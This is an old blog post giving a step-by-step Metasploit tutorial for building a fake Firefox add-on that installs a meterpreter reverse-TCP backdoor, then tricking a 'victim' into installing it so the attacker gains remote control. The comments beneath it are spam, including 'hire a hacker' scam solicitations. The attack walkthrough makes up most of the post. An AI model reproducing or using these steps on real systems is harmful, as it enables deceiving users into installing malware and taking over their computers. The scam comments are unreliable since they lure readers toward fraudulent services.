Thursday, June 14, 2012

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials

>What am i doing?
1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
2. Trick users into installing the add-on
3. Break into the Target Machine.

*. As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target"and "Attacker".
*. Install the windows xp or 7 in the Target VM.
*. Install the Backtrack in the Attacker VM.

>Part I: Update the Metasploit-

As we are going to use the latest module, you are advised to update the Metasploit modules. Don't know how to do this? No need to worry!
*. Open the Terminal
*. type msfupdate
*. This will update the Metasploit with latest modules..

>Part II: Configuring settings in Metasploit for the fake-addon exploit-

*Step 1:
Open the Terminal and type " msfconsole " to get the Metasploit console.
*Step 2:
Type " use exploit/multi/browser/firefox_xpi_bootstrapped_addon " in the console.
*Step 3:
Now we have to know the list of settings available for this exploit module. In order to get the list, you can type "show options" in the console.

*Step 4: Configurations-

Let us configure the setting for the exploit.
type the commands..

Command: set addonname fake

Details: Name for the fake add-on. you can change the "fake" to any name.

Command: set SRVHOST

Details: Here the is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set SRVPORT 80

Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx

Details: The path in which the fake add-on will be available to download. For ex: http://192.1xx.5x.xx/fakeaddon

Command: set LHOST

Details: Here the is the ip of Backtrack. You can get this ip by simply typing the "ifconfig" in the terminal.

>Step 5: Payload-

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

>Part III: Social Engineering Attack-

Successfully configured the settings for the exploit, what else? let us launch the exploit.

Type "exploit" in the console.
Now the exploit is started. Our fake add-on is available at,"http://192.1xx.5x.xx/fakeaddon".

Once victim visit the link, it will ask user to install the add-on in order to view the page. Once user install the add-on, the system will be backdoor-ed.

Now , You can control the victim system from meterpreter..


Blogger said...

If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you must watch this video
right away...

(VIDEO) Get your ex back with TEXT messages?

Blogger said...

BlueHost is ultimately the best web-hosting company with plans for all of your hosting requirements.

hugo sam said...

times come when one seriously and urgently needs the services of a world class pedigree hacker
our research showed more than 70% end up in the hands of scammers,
25% gets tired of the search and give up while just less than 2% truely meet REAL HACKERS..
visit the link below would be of help to you....

hugo sam said...

In order to get a good and reliable hacker, it is advised you know first HOW TO HIRE A HACKER and how to know the hacker you should go for

Post a Comment

Design by Secure Hackers